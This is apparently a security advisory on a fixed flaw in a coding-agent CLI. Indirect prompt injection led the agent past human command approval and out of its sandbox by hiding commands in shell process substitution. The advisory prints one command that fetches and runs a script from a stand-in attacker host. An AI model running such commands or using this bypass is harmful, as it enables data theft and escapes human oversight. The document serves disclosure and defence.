Threat Intelligence

Snowflake Cortex AI Escapes Sandbox and Executes Malware

A vulnerability in the Snowflake Cortex Code CLI allowed malware to be installed and executed via indirect prompt injection, bypassing human-in-the-loop command approval and escaping the sandbox.

The Snowflake Cortex Code CLI is a command-line coding agent that operates similarly to Claude Code and OpenAI’s Codex, with an additional built-in integration to run SQL in Snowflake.

Two days after release, a vulnerability was identified in Cortex Code’s command validation system that allowed specially constructed malicious commands to:

• Execute arbitrary commands without triggering human-in-the-loop approval steps
• Execute those commands outside of the Cortex CLI’s sandbox.

We demonstrate that, via indirect prompt injection, an attacker could manipulate Cortex to download and execute scripts without approval that leverage the victim’s active credentials to perform malicious actions in Snowflake (e.g., Exfiltrate data, drop tables).

The Snowflake security team worked diligently to validate and remediate this vulnerability, and a fix was released with Cortex Code CLI version 1.0.25 on February 28th, 2026.

How the Bypass Worked

Cortex failed to validate commands inside process substitution expressions, allowing unapproved execution of malicious commands like cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)). Any shell commands were executed without triggering human approval as long as the unsafe commands were within a <() expression and the full command started with a “safe” command.

Furthermore, the prompt injection manipulated the model to set a flag for unsandboxed execution. Because of the human-in-the-loop bypass, the command ran immediately outside the sandbox without the user ever being prompted for consent.

Impact and Risks

With remote code execution on a victim’s device, attackers can leverage cached tokens used by Cortex to authenticate to Snowflake. This allows them to:

• Steal database contents
• Drop tables
• Add malicious backdoor users
• Lock legitimate users out with network rules

During testing, context loss between sub-agents resulted in the main Cortex agent advising the user not to run a command that had already been executed by a second-level sub-agent. Snowflake has indicated that the fix is automatically applied through an update when customers next launch Cortex.